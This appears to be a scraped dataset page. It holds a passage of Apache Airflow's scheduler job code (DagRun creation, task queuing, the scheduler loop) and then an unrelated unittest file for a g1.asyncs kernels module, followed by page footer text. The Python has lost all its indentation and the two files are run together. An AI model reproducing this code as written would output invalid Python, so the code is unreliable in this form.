Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in six.iteritems(dagbag.import_errors):
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future
if run.execution_date > timezone.utcnow():
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
tis = run.get_task_instances(state=SCHEDULEABLE_STATES)
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_state: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_state will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
if self.using_sqlite:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = (timezone.utcnow()
if not task_instance.queued_dttm
else task_instance.queued_dttm)
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Running execute loop for %s seconds", self.run_duration)
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessor(file_path,
pickle_dags,
self.dag_ids,
zombies)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while (timezone.utcnow() - execute_start_time).total_seconds() < \
self.run_duration or self.run_duration < 0:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if len(simple_dags) > 0:
try:
simple_dag_bag = SimpleDagBag(simple_dags)
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
continue
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: list[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = [dag.dag_id for dag in dagbag.dags.values()
if dag.is_paused]
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
test_public.py
|
import unittest
import threading
from g1.asyncs import kernels
class KernelsTest(unittest.TestCase):
def test_contexts(self):
def test_with_kernel():
self.assertIsNotNone(kernels.get_kernel())
self.assertIsNone(kernels.get_kernel())
kernels.call_with_kernel(test_with_kernel)
self.assertIsNone(kernels.get_kernel())
def test_nested(self):
ks = []
steps = []
outer(ks, steps)
self.assert_nested(ks, steps)
def test_nested_with_threads(self):
ks1 = []
steps1 = []
ks2 = []
steps2 = []
t1 = threading.Thread(target=outer, args=(ks1, steps1))
t2 = threading.Thread(target=outer, args=(ks2, steps2))
t1.start()
t2.start()
t1.join()
t2.join()
self.assert_nested(ks1, steps1)
self.assert_nested(ks2, steps2)
# Different kernels on different threads.
self.assertIsNot(ks1[0], ks2[0])
def assert_nested(self, ks, steps):
self.assertEqual(len(ks), 2)
self.assertIsNotNone(ks[0])
self.assertIs(ks[0], ks[1]) # Same kernel per thread.
self.assertEqual(steps, [1, 2, 3])
@kernels.with_kernel
def outer(ks, steps):
k = kernels.get_kernel()
ks.append(k)
steps.append(1)
inner(ks, steps)
steps.append(3)
@kernels.with_kernel
def inner(ks, steps):
k = kernels.get_kernel()
ks.append(k)
steps.append(2)
if __name__ == '__main__':
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.